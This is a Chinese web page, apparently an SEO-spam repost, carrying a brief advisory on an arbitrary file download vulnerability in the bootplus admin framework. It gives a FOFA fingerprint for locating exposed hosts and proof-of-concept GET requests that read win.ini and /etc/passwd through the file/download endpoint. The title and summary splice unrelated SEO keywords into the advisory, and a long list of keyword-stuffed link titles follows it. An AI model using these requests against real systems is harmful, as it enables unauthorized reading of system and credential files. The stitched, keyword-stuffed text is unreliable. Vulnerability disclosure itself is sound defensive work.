当前位置：首页 > wzjs >正文

北京工厂网站建设seo外链在线提交工具

wzjs 2025/8/28 13:39:37

北京工厂网站建设,seo外链在线提交工具,威海企业做网站,网站运营需要做哪些工作bootplus管理系统 file/download 任意文件下载漏洞漏洞描述 bootplus是基于SpringBoot + Shiro + MyBatisPlus的，拥有接口管理，权限管理，监控组件等功能的一体化权限管理框架。该项目中的file/download接口存在任意文件下载漏洞，攻击者可以通过该漏洞下载查看目标系统的…

bootplus管理系统 file/download 任意文件下载漏洞

漏洞描述

bootplus是基于SpringBoot + Shiro + MyBatisPlus的，拥有接口管理，权限管理，监控组件等功能的一体化权限管理框架。该项目中的file/download接口存在任意文件下载漏洞，攻击者可以通过该漏洞下载查看目标系统的任意文件。

威胁等级: 高危

漏洞分类: 任意文件读取

涉及厂商及产品：bootplus

是否开源：是

应用指纹及检出思路

匹配源代码/statics/css/admin/AdminLTE.min.css 即可

fofa : body="/statics/css/admin/AdminLTE.min.css"

漏洞复现

GET /file/download?name=C://windows/win.ini&real=1 HTTP/1.1
Host: 127.0.0.1:8090

GET /file/download?name=/etc/passwd&real=1

http://www.dtcms.com/wzjs/520001.html

相关文章：

独立站 wordpress曼联官方发文

族蚂建站怎么样平台推广是做什么

web网站开发使用语言网络营销服务商

网站统计模板优秀的软文广告案例

专业房地产网站建设seo网站自动推广

用dw个人网站怎么做网络营销seo优化

阿里云做淘宝客网站吗诊断网站seo现状的方法

辽阳制作网站百度竞价返点开户

网站制作尺寸外贸网站建设报价

阿里云的轻量服务器怎么做网站合肥关键词优化平台

公众号商城怎么开网站seo谷歌

企业建站系统插件介绍怎么弄一个网站平台

河北精品网站建设深圳推广公司

wordpress ajax 插件厦门seo排名收费

做我男朋友的网站安全优化大师下载

台湾设计师网站网站排名优化技巧

如何做一个小程序商城windows优化大师

网站建设中模版seo怎么弄

汽车网站管理系统app软件推广平台

怎么做网站链接支付互联网营销师考试题及答案

沧州网站建设哪家好网站建立的步骤

网站开发线框自己创建网页

重庆专业网站建设公司哪家好网站信息

做一个营销型网站有哪些内容怎么推广自己的公司

深圳地质建设网站百度指数如何提升

深圳做自适应网站制作网站优化福州

html 手机网站开发网站推广服务报价表

网站代运营多少钱如何制作网站免费建站

漳州做网站配博大钱少a线上推广app

邦邻网站建设职业技能培训网